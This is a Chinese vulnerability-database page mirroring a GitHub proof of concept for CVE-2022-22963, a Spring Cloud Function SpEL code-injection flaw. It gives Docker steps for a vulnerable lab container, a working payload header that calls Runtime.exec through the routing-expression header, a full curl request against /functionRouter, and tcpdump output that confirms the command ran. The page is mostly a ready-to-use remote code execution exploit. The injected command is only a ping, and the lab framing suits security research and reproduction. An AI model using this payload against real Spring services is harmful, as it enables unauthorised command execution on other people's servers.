漏洞平台

POC详情： 62924d833ba8bd1b5de100e34b9a55fb2cc10d9f

来源

https://github.com/twseptian/cve-2022-22963

关联漏洞

标题： Spring Framework 代码注入漏洞 (CVE-2022-22963)
描述：Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞。目前暂无该漏洞信息，请随时关注CNNVD或厂商公告。

描述

Spring Cloud Function SpEL - cve-2022-22963

介绍

# Spring Cloud Function SpEL - cve-2022-22963
## Build
```bash
$ git clone https://github.com/twseptian/cve-2022-22963.git
$ cd cve-2022-22963
$ docker build . -t spring-spel-0day
$ docker run -p 8080:8080 --name spring-spel-0day spring-spel-0day
```

![docker run](docker_run.png)

## Payload
```bash
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("ping -c5 172.17.0.1")
```
## PoC
run ping command, and take the responses from attacker machine
```bash
$ curl -i -s -k -X $'POST' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"ping -c5 172.17.0.1\")' -H $'Content-Type: application/x-www-form-urlencoded' $'http://172.17.0.2:8080/functionRouter'
```
responses
```bash
$ sudo tcpdump icmp -i docker0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on docker0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
13:42:01.815194 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 0, length 64
13:42:01.815209 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 0, length 64
13:42:02.815571 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 1, length 64
13:42:02.815594 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 1, length 64
13:42:03.815985 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 2, length 64
13:42:03.816009 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 2, length 64
13:42:04.816389 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 3, length 64
13:42:04.816426 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 3, length 64
13:42:05.816751 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 4, length 64
13:42:05.816775 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 4, length 64
```

## References
- [Spring-Cloud-Function-SpEL](https://github.com/Pizz33/Spring-Cloud-Function-SpEL)
- [漏洞复现-Spring Cloud Function SpEL表达式注入](https://pizz33.github.io/2022/03/27/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-Spring%20Cloud%20Function%20SpEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5/)

文件快照


 [4.0K]  /data/pocs/62924d833ba8bd1b5de100e34b9a55fb2cc10d9f
├── [ 186]  Dockerfile
├── [ 94K]  docker_run.png
├── [4.0K]  jar
│   └── [ 19M]  demo-0.0.1-SNAPSHOT.jar
└── [2.1K]  README.md

1 directory, 4 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。